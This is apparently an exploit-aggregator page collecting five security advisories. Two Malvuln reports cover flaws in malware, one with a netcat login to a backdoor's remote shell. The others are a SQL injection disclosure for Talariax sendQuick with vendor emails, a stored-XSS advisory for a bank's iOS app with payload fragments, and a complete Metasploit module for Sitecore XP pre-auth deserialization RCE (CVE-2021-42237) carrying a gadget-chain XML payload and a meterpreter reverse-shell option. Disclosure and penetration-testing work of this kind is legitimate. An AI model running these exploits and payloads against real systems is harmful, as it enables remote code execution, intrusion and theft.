Latest exploits :: CodePwn

<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022 Original source: https://malvuln.com/advisory/54530f88c8e4f4371c9418f00c256b1d.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: CollectorStealerBuilder v2.0.0 Panel Vulnerability: Insecure Credential Storage Description: The panel for Collector Stealer malware stores the login creds in plaintext in its MySQL database. Third-party attackers who gain access to the system can read the database username passwords without having to crack them offline. Type: WebUI MD5: 54530f88c8e4f4371c9418f00c256b1d MD5: 8c003105229554557c75ec836b4fcf79 (collect.php) Vuln ID: MVID-2022-0458 Disclosure: 01/19/2022 Exploit/PoC: -- -- phpMyAdmin SQL Dump -- version 4.9.7 -- https://www.phpmyadmin.net/ -- -- Хост: localhost -- Время создания: Фев 22 2021 г., 19:56 -- Версия сервера: 5.7.21-20-beget-5.7.21-20-1-log -- Версия PHP: 5.6.40 SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO"; SET AUTOCOMMIT = 0; START TRANSACTION; SET time_zone = "+00:00"; /*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */; /*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */; /*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */; /*!40101 SET NAMES utf8mb4 */; -- -- База данных: `jkrefsewer_1` -- -- -------------------------------------------------------- -- -- Структура таблицы `Information` -- -- Создание: Фев 19 2021 г., 11:04 -- Последнее обновление: Фев 22 2021 г., 16:54 -- DROP TABLE IF EXISTS `Information`; CREATE TABLE `Information` ( `Build` text NOT NULL, `hash` text, `Date` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00' ON UPDATE CURRENT_TIMESTAMP, `Country` text, `IP` text, `Cookies` int(11) DEFAULT NULL, `Passwords` int(11) DEFAULT NULL, `Cards` int(11) DEFAULT NULL, `Wallets` int(11) DEFAULT NULL, `Path` text ) ENGINE=InnoDB DEFAULT CHARSET=utf8; -- -------------------------------------------------------- -- -- Структура таблицы `users` -- -- Создание: Фев 17 2021 г., 14:15 -- DROP TABLE IF EXISTS `users`; CREATE TABLE `users` ( `id` int(11) NOT NULL, `username` varchar(45) COLLATE utf8_unicode_ci NOT NULL, `password` varchar(45) COLLATE utf8_unicode_ci NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci; -- -- Дамп данных таблицы `users` -- INSERT INTO `users` (`id`, `username`, `password`) VALUES (1, 'admin', 'admin'); -- -- Индексы сохранённых таблиц -- -- -- Индексы таблицы `users` -- ALTER TABLE `users` ADD PRIMARY KEY (`id`); -- -- AUTO_INCREMENT для сохранённых таблиц -- -- -- AUTO_INCREMENT для таблицы `users` -- ALTER TABLE `users` MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2; COMMIT; /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */; /*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */; /*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */; Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022 Original source: https://malvuln.com/advisory/204613443e555f73237ea43a2faecaa5_B.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.Wollf.16 Vulnerability: Weak Hardcoded Credentials Description: The malware runs with SYSTEM integrity, listens on TCP port 1015 and is protected by Armadillo(3.00a-3.70a) & UPX(1.07)NRV,brute. However, the password "ddr_bkdoor" is weak and can be found at offset 0019F58C. Type: PE32 MD5: 204613443e555f73237ea43a2faecaa5 Vuln ID: MVID-2022-0463 Dropped files: ddradmin.exe Disclosure: 01/20/2022 Exploit/PoC: nc64.exe x.x.x.x 1015 Login: ddr_bkdoor Login succeed! "Wollf Remote Manager" v1.6 Code by wollf, http://www.xfocus.org [DESKTOP-2C3IQHO@C:\WINDOWS\system32]#HELP DOS Switch to MS-DOS prompt DIR/LS/LIST Directory and file list CD Entry directory MD/MKDIR Make directory PWD Get current dirctory COPY/CP Copy file DEL/RM Delete directory/file REN/RENAME Rename file MOVE/MV Move file TYPE/CAT Type text file POPMSG Popup message box SYSINFO Get system information WHO/W Get current connections SHELL Execute command by system shell(cmd.exe) EXEC/RUN Execute file by windows API(WinExec) WS Windows list PS Process list KILL Kill process GET/GETFILE Download file from remote machine PUT/PUTFILE Upload file to remote machine WGET Get file from web server FGET Get file from ftp server FPUT Put file to ftp server TELNET Connect to other host FTPD Start ftp service TELNETD/TELD/EXPORT Start telnet service (export shell) REDIR Redirect tcp data from <Port> to <Dest_host:Dest_port> REDIR_STOP Stop redirect tcp data SNIFF Sniff ftp/smtp/pop3/http password what via ethernet SNIFF_STOP Stop ethernet sniffer KEYLOG Start keyboard record KEYLOG_STOP Stop keyboard record REBOOT Reboot windows SHUTDOWN Shutdown windows EXIT Close current connection QUIT Close all connection and abort service REMOVE Remove service VER/VERSION Version information HELP/H/? Show help message Type "HELP | MORE" for multipage display. Command "HELP" succeed. [DESKTOP-2C3IQHO@C:\WINDOWS\system32]#POPMSG malvuln was here Command "POPMSG" succeed. Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>Dear Full Disclosure Team, We are writing to submit a full disclosure for the following vulnerability discovered for product Talariax sendQuick Alertplus server admin version 4.3. This is an updated reference for https://seclists.org/fulldisclosure/2021/Oct/1. ------------------------------------------------------------------------ *Title:* SQL injection vulnerability in Talariax sendQuick Alertplus server admin version 4.3 *CVE Reference:* **RESERVED** CVE-2021-26795 *Product:* Talariax sendQuick Alertplus server admin *Vendor:* TalariaX Pte Ltd *Vulnerable version: *Talariax sendQuick Alertplus Server Admin version 4.3 Patch no 8HF8 and below. *Fixed version: *Patch no 8HF11 *Impact: *High *Vulnerability Type:* SQL Injection (CWE-89) *Vendor notification (and approval for disclosure):* 2021-Oct-05 *Public Disclosure:* 2021-Oct-06 *Discoverer: *Jerry Toh (t.ghimhong@gmail.com), Edmund Ong ( edmund.okx@gmail.com) ------------------------------------------------------------------------ *Vulnerability details: * SQL Injection in the web interface of Talariax sendQuick Alertplus server admin allows an authenticated user to perform error-based SQL injection via unsanitized form fields. The affected URL is found in the Roster Management function: /appliance/shiftmgn.php The attached screenshots (see evidence*.jpeg) shows that: (1) Vulnerability was discovered showing that there is an error message which states that the SQL Syntax error after a single quotation mark was appended upon the form submission causing an error message which is thrown from the database (2) Finding was subsequently verified as fixed after input validation was implemented in the fields. ------------------------------------------------------------------------ *Proof of concept:* The following input fields were found to be vulnerable to SQL injection: Navigate to "Roster Management" > Select Edit Roster > Day Selected > Input fields "Roster Time". (see evidence-2.jpeg). The screenshot above shows that there is an error message which states that the SQL Syntax error, after a single quotation mark ('), is being appended upon the form submission. ------------------------------------------------------------------------ *Remediation:* Although the patch (Patch no 8HF11) was tested to have fixed this, it is still recommended to use the latest product version/patches. Please approach the vendor for the latest product patches. ------------------------------------------------------------------------ *Disclosure details:* - 2021/10/04 Contacted email for permission to disclose - 2021/10/05 Vendor responded and approved for public disclosure submission - 2021/10/06 Public disclosure on SecList ( https://seclists.org/fulldisclosure/2021/Oct/1) - 2021/11/11 Added CVE details for public disclosure reference ----------------------------------------------------------------------------------- *Additional references:* Below email attachment is the request approval for disclosure by vendor Delivered-To: edmund.okx@gmail.com Received: by 2002:a67:c982:0:0:0:0:0 with SMTP id y2csp1780343vsk; Mon, 4 Oct 2021 21:31:06 -0700 (PDT) (envelope-from <jswong@talariax.com>) id 1mXc6V-0004bO-R8; Tue, 05 Oct 2021 12:30:58 +0800 Reply-To: jswong@talariax.com Subject: Re: Responsible disclosure of vulnerability in Talariax sendQuick Alertplus server admin (patched) To: Edmund Ong <edmund.okx@gmail.com> Cc: t.ghimhong@gmail.com References: <CAO0qOZwUuMcjpwvdAg1B4vZ-qrWHfwjixaMMTDh2= 11Nr3N47g@mail.gmail.com> From: JS Wong <jswong@talariax.com> Organization: TalariaX Pte Ltd Message-ID: <47e14d24-ee1d-5b06-8f2f-20c7fa586957@talariax.com> Date: Tue, 5 Oct 2021 12:30:58 +0800 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Thunderbird/78.14.0 --------------DBF6FC3FBFBCBF83D5A5DEEB Content-Type: text/plain; charset=utf-8; format=flowed Content-Transfer-Encoding: 8bit Dear Edmund Hi! Thanks for informing us on the issue found. We are pleased to inform that we had fixed the issue in our patches and as long as customer update to the latest patches, the issue is resolved. If you wish to submit to public domain as CVE, we will not stop you from doing so. Thanks for informing us Regards JS On 4/10/2021 7:24 pm, Edmund Ong wrote: > Dear Talariax, > > We discovered a SQL injection vulnerability on one of your product > Talariax sendQuick Alertplus server admin during the period of Q4-2020 > to Q1-2021. > > This commercial off-the-shelf product was used by one of our clients > and they may or may not have reported this to you. The finding was > subsequently addressed and finding was closed (as shown in the > screenshots the affected patch no 8HF8, and the fix released was patch > no 8HF11) although we do not have the specific product version that is > affected but we have reason to believe that at that point of testing > the product Talariax sendQuick Alertplus server admin version was > version 4.3 (do correct us if this is wrong). We felt responsible to > share this finding with you directly so that you could ensure this > vulnerability would be (or had been) addressed in all subsequent > releases. > > *Finding details:* SQL Injection in the web interface of Talariax > sendQuick Alertplus server admin allows an authenticated user to > perform error-based SQL injection via unsanitized form fields. > > *Affected URL:* /appliance/shiftmgn.php > > *Evidence* (see attached screenshots evidence*.jpeg) > We attached the following screenshots to evidence that: > (1) Vulnerability was discovered showing that there is an error > message which states that the SQL Syntax error after a single > quotation mark was appended upon the form submission causing an error > message which is thrown from the database > (2) Finding was subsequently verified as fixed after input validation > was implemented in the fields. > > We would also like to seek your approval for us to perform responsible > disclosure to the public of this information. The intention is to help > potential victims gain knowledge and raise awareness that > vulnerability exists, Talariax could also provide us a > recommendation if you so please so that we could include in the > writeup (e.g. such as to update to the latest patch and versions). > Please note that if we don't hear from you within 14 days, we will > proceed to do full disclosure through > https://nmap.org/mailman/listinfo/fulldisclosure > <https://nmap.org/mailman/listinfo/fulldisclosure>. > > -- > Yours Sincerely, > Edmund Ong -- JS Wong (Mr.) TalariaX Pte Ltd 76 Playfair Road #08-01 LHK2 Singapore 367996 Tel: +65 62802881 Fax: +65 62806882 Mobile: +65 96367680 Web: http://www.talariax.com CONFIDENTIALITY NOTE: This email and any files transmitted with it is intended only for the use of the person(s) to whom it is addressed, and may contain information that is privileged, confidential and exempt from disclosure under applicable law. If you are not the intended recipient, please immediately notify the sender and delete the email. If you are not the intended recipient please do not disclose, copy, distribute or take any action in reliance on the contents of this e-mail. Thank you. ------------------------------------------------------------------------ </code></pre>

<pre><code>Document Title: =============== Banco Guayaquil Versión 8.0.0 IOS - Cross Site Scripting Stored Credits & Authors: ================== TaurusOmar - @TaurusOmar_ (whoami@taurusomar.com) [taurusomar.com] Vendor Homepage: https://apps.apple.com/ec/app/banco-guayaquil/id624963066 =============== Release Date: ============= 2022-01-21 Security Risk: ============== The security risk of the persistent input validation vulnerability in the name value is estimated as medium. (CVSS 3.7) Product & Service Introduction: =============================== Official application of Banco Guayaquil to manage your finances your products with Banco Guayaquil, Make transactions from your accounts, Pay credit cards, loans and services as well as access your movements, Deposit checks, Request checkbooks, block cards, activate or deactivate consumption of the Internet and much more. Abstract Advisory Information: ============================== An independent Vulnerability Laboratory researcher discovered multiple vulnerabilities in the official aplication Banco Guayaquil 8.0.0. Vulnerability Disclosure Timeline: ================================== 2022-01-21: Public Disclosure Discovery Status: ================= Published Affected Product(s): ==================== Readdle Product: Banco Guayaquil - iOS Mobile Application Exploitation Technique: ======================= Local Severity Level: =============== Low Technical Details & Description: ================================ An application-side input validation vulnerability has been discovered in the official Banco Guayaquil iOS mobile application. The vulnerability allows a local attacker to inject own script code as payload to the application-side of the vulnerable service function or module. The vulnerability exists in the TextBox Name Profile in which injects the code is activated When the application is opened and close the app. Request Method(s): [+] Import Vulnerable Module(s): [+] Add Name Vulnerable Parameter(s): [+] TextBox Name Profile Vulnerable Final(s): [+] Save Profile Proof of Concept (PoC): ======================= The persistent input validation web vulnerability can be exploited by local attackers with system user account and without . For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. 1. Install the ios application ( https://apps.apple.com/ec/app/banco-guayaquil/id624963066) 2. Add new name profile with script in the TexBox Name 2. Save Profile 3. Close app 4. Open Aplication 4. Successful reproduce of the persistent vulnerability! Proof of Concept (IMAGES): ======================= 1. https://i.imgur.com/Cc1VFUf.png 2. https://i.imgur.com/r1HWwrs.png Proof of Concept (VIDEO): ======================= 1. https://imgur.com/a/lQHt1br Payload: Cross Site Scripting ============================ Use Breaks JS Context: <object data>, javascript:alert, <img onerror> text/html;base64,PHNjcmlwdD5hbGVydCgiVnVsbmVyYWJsZSIpOzwvc2NyaXB0Pg ####### # # Disclaimer: # This or previous programs are for Educational purpose ONLY. Do not use it without permission. # The usual disclaimer applies, especially the fact that Taurus Omar is not liable for any damages # caused by direct or indirect use of the information or functionality provided by these programs. # The author or any Internet provider bears NO responsibility for content or misuse of these programs # or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, # system crash, system compromise, etc.) caused by the use of these programs are not Taurus Omar's # responsibility. # ####### </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager include Msf::Exploit::Powershell def initialize(info = {}) super( update_info( info, 'Name' => 'Sitecore Experience Platform (XP) PreAuth Deserialization RCE', 'Description' => %q{ This module exploits a deserialization vulnerability in the Report.ashx page of Sitecore XP 7.5 to 7.5.2, 8.0 to 8.0.7, 8.1 to 8.1.3, and 8.2 to 8.2.7. Versions 7.2.6 and earlier and 9.0 and later are not affected. The vulnerability occurs due to Report.ashx's handler, located in Sitecore.Xdb.Client.dll under the Sitecore.sitecore.shell.ClientBin.Reporting.Report defintion, having a ProcessRequest() handler that calls ProcessReport() with the context of the attacker's request without properly checking if the attacker is authenticated or not. This request then causes ReportDataSerializer.DeserializeQuery() to be called, which will end up calling the DeserializeParameters() function of Sitecore.Analytics.Reporting.ReportDataSerializer, if a "parameters" XML tag is found in the attacker's request. Then for each subelement named "parameter", the code will check that it has a name and if it does, it will call NetDataContractSerializer().ReadObject on it. NetDataContractSerializer is vulnerable to deserialization attacks and can be trivially exploited by using the TypeConfuseDelegate gadget chain. By exploiting this vulnerability, an attacker can gain arbitrary code execution as the user that IIS is running as, aka NT AUTHORITY\NETWORK SERVICE. Users can then use technique 4 of the "getsystem" command to use RPCSS impersonation and get SYSTEM level code execution. }, 'Author' => [ 'AssetNote', # Discovery and exploit 'gwillcox-r7' # Module ], 'References' => [ ['CVE', '2021-42237'], ['URL', 'https://blog.assetnote.io/2021/11/02/sitecore-rce/'], ['URL', 'https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776'], ], 'DisclosureDate' => '2021-11-02', 'License' => MSF_LICENSE, 'Platform' => 'win', 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], 'Privileged' => false, # Gains NT AUTHORITY\NETWORK SERVICE privileges. Possible to elevate to SYSTEM but this isn't done automatically. 'Targets' => [ [ 'Windows Command', { 'Arch' => ARCH_CMD, 'Type' => :win_cmd, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell_bind_tcp' } } ], [ 'Windows Dropper', { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :win_dropper, 'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' } } ], [ 'PowerShell Stager', { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :psh_stager, 'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' } } ] ], 'DefaultTarget' => 1, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ) ) register_options([ OptString.new('TARGETURI', [true, 'Base path of Sitecore', '/']) ]) end def check res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'sitecore', 'shell', 'ClientBin', 'Reporting', 'Report.ashx') ) unless res return CheckCode::Unknown('Target did not respond to check.') end unless res.code == 200 && res.body.include?('Sitecore.Analytics.Reporting.ReportDataSerializer.DeserializeQuery') return CheckCode::Safe('Target is not running Sitecore XP or has patched the vulnerability.') end return CheckCode::Appears('Response.ashx is accessible and appears to be deserializing data!') end def xml_payload(cmd) %|<parameters> <parameter name=""> <ArrayOfstring z:Id="1" z:Type="System.Collections.Generic.SortedSet`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]" z:Assembly="System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns:x="http://www.w3.org/2001/XMLSchema" xmlns:z="http://schemas.microsoft.com/2003/10/Serialization/"> <Count z:Id="2" z:Type="System.Int32" z:Assembly="0" xmlns="">2</Count> <Comparer z:Id="3" z:Type="System.Collections.Generic.ComparisonComparer`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]" z:Assembly="0" xmlns=""> <_comparison z:Id="4" z:FactoryType="a:DelegateSerializationHolder" z:Type="System.DelegateSerializationHolder" z:Assembly="0" xmlns="http://schemas.datacontract.org/2004/07/System.Collections.Generic" xmlns:a="http://schemas.datacontract.org/2004/07/System"> <Delegate z:Id="5" z:Type="System.DelegateSerializationHolder+DelegateEntry" z:Assembly="0" xmlns=""> <a:assembly z:Id="6">mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:assembly> <a:delegateEntry z:Id="7"> <a:assembly z:Ref="6" i:nil="true"/> <a:delegateEntry i:nil="true"/> <a:methodName z:Id="8">Compare</a:methodName> <a:target i:nil="true"/> <a:targetTypeAssembly z:Ref="6" i:nil="true"/> <a:targetTypeName z:Id="9">System.String</a:targetTypeName> <a:type z:Id="10">System.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type> </a:delegateEntry> <a:methodName z:Id="11">Start</a:methodName> <a:target i:nil="true"/> <a:targetTypeAssembly z:Id="12">System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:targetTypeAssembly> <a:targetTypeName z:Id="13">System.Diagnostics.Process</a:targetTypeName> <a:type z:Id="14">System.Func`3[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type> </Delegate> <method0 z:Id="15" z:FactoryType="b:MemberInfoSerializationHolder" z:Type="System.Reflection.MemberInfoSerializationHolder" z:Assembly="0" xmlns="" xmlns:b="http://schemas.datacontract.org/2004/07/System.Reflection"> <Name z:Ref="11" i:nil="true"/> <AssemblyName z:Ref="12" i:nil="true"/> <ClassName z:Ref="13" i:nil="true"/> <Signature z:Id="16" z:Type="System.String" z:Assembly="0">System.Diagnostics.Process Start(System.String, System.String)</Signature> <Signature2 z:Id="17" z:Type="System.String" z:Assembly="0">System.Diagnostics.Process Start(System.String, System.String)</Signature2> <MemberType z:Id="18" z:Type="System.Int32" z:Assembly="0">8</MemberType> <GenericArguments i:nil="true"/> </method0> <method1 z:Id="19" z:FactoryType="b:MemberInfoSerializationHolder" z:Type="System.Reflection.MemberInfoSerializationHolder" z:Assembly="0" xmlns="" xmlns:b="http://schemas.datacontract.org/2004/07/System.Reflection"> <Name z:Ref="8" i:nil="true"/> <AssemblyName z:Ref="6" i:nil="true"/> <ClassName z:Ref="9" i:nil="true"/> <Signature z:Id="20" z:Type="System.String" z:Assembly="0">Int32 Compare(System.String, System.String)</Signature> <Signature2 z:Id="21" z:Type="System.String" z:Assembly="0">System.Int32 Compare(System.String, System.String)</Signature2> <MemberType z:Id="22" z:Type="System.Int32" z:Assembly="0">8</MemberType> <GenericArguments i:nil="true"/> </method1> </_comparison> </Comparer> <Items z:Id="24" z:Type="System.String[]" z:Assembly="0" z:Size="2" xmlns=""> <string z:Id="25" xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">/c #{cmd.encode(xml: :text)}</string> <string z:Id="26" xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">cmd.exe</string> </Items> </ArrayOfstring> </parameter> </parameters>| end def exploit case target['Type'] when :win_cmd print_status('Executing command payload') execute_command(payload.encoded) when :win_dropper execute_cmdstager when :psh_stager execute_command(cmd_psh_payload( payload.encoded, payload.arch.first, remove_comspec: true )) end end def execute_command(cmd, _opts = {}) send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'sitecore', 'shell', 'ClientBin', 'Reporting', 'Report.ashx'), 'ctype' => 'text/xml', 'data' => xml_payload(cmd) ) end end </code></pre>